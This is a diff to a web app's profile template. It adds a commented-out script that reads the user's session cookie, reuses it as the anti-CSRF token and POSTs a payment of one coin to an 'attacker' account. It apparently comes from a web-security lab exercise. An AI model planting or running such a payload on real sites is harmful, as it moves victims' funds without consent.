--- a/app/views/profile.html
+++ b/app/views/profile.html
@@ -56,6 +56,27 @@
     </div>
     <input class="form-button" type="submit" value="Update"/>
   </form>
+
+<!-- Script below is for XMLHttpRequest version of sending attacker 1 coin
+  <script>
+  var xhttp = new XMLHttpRequest();
+  var url = '/pay';
+  var data = new FormData();
+  data.append('recipient', 'attacker');
+  data.append('amount', 1);
+  // TODO: Are we supposed to need the csrf token here? 
+  var cookie = decodeURIComponent(document.cookie);
+  var sesh = cookie.slice(cookie.indexOf("=")+1, cookie.length);
+  data.append('anticsrf_token', sesh);
+  xhttp.open('POST', url);
+  // xhttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
+  xhttp.onload = function() {
+    console.log("Post request to /pay loaded");
+  };
+  xhttp.send(data);
+  </script>
+-->
+
 </div>
 {% endif %}
 {% endblock %}
